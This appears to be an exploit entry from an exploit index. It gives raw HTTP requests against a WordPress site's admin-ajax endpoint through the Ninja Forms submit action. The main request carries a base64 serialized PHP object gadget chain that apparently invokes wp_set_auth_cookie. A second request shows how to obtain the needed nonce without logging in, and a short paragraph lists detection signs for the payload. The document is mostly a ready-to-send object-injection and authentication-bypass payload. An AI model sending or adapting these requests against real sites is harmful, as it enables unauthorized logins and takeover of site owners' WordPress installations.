## https://sploitus.com/exploit?id=WPEX-ID:8843D66B-E895-4336-AFDA-00B99442CDC1
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: http://example.comted.com/?NF_Admin_Processes_ImportForm::startup=42
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1976

action=nf_ajax_submit&security=XXXX&nonce_ts=YYYY&formData={"id":"1","fields":{"1":{"id":"1","value":"{querystring:NF_Admin_Processes_ImportForm::startup}"},"3":{"id":"1","value":"42"}},"settings":{"actions":{"1":{"42":"42"}}},"actions":{"1":{"42":"42"}},"extra":{}}&extraData[content]=a;base64,Tzo0NDoiWW9hc3RTRU9fVmVuZG9yXEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0iOjQ6e3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzdHJlYW1zIjtPOjgyOiJZb2FzdFNFT19WZW5kb3JcU3ltZm9ueVxDb21wb25lbnRcRGVwZW5kZW5jeUluamVjdGlvblxBcmd1bWVudFxSZXdpbmRhYmxlR2VuZXJhdG9yIjoyOntzOjkzOiIAWW9hc3RTRU9fVmVuZG9yXFN5bWZvbnlcQ29tcG9uZW50XERlcGVuZGVuY3lJbmplY3Rpb25cQXJndW1lbnRcUmV3aW5kYWJsZUdlbmVyYXRvcgBnZW5lcmF0b3IiO2E6Mjp7aTowO086NDY6IllvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFByb21pc2VcRWFjaFByb21pc2UiOjc6e3M6NTU6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAHBlbmRpbmciO2E6MTp7aToxO3M6NDoidmZydCI7fXM6NTY6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAGl0ZXJhYmxlIjtDOjEzOiJBcnJheUl0ZXJhdG9yIjozNjp7eDppOjA7YToxOntpOjE7czo0OiJ2ZnJ0Ijt9O206YTowOnt9fXM6NTk6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAGNvbmN1cnJlbmN5IjtzOjE4OiJ3cF9zZXRfYXV0aF9jb29raWUiO3M6NTk6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG9uRnVsZmlsbGVkIjtOO3M6NTg6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG9uUmVqZWN0ZWQiO047czo1NzoiAFlvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFByb21pc2VcRWFjaFByb21pc2UAYWdncmVnYXRlIjtOO3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQcm9taXNlXEVhY2hQcm9taXNlAG11dGV4IjtOO31pOjE7czo3OiJwcm9taXNlIjt9czo4OToiAFlvYXN0U0VPX1ZlbmRvclxTeW1mb255XENvbXBvbmVudFxEZXBlbmRlbmN5SW5qZWN0aW9uXEFyZ3VtZW50XFJld2luZGFibGVHZW5lcmF0b3IAY291bnQiO047fXM6NTQ6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO3M6NTM6IgBZb2FzdFNFT19WZW5kb3JcR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBjdXJyZW50IjtpOjA7czo0OToiAFlvYXN0U0VPX1ZlbmRvclxHdXp6bGVIdHRwXFBzcjdcQXBwZW5kU3RyZWFtAHBvcyI7aTowO30=


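The security and nonce_ts parameters can be retrieved via the request below. That request carries no session cookie, so the nonce is not an authentication barrier for the first request. For detection, the first request stands out by a `{querystring:...}` field value naming a `Class::method`, and by an `extraData[content]` base64 value beginning with `Tzo`, which decodes to `O:` (a serialized PHP object).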

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

action=nf_ajax_submit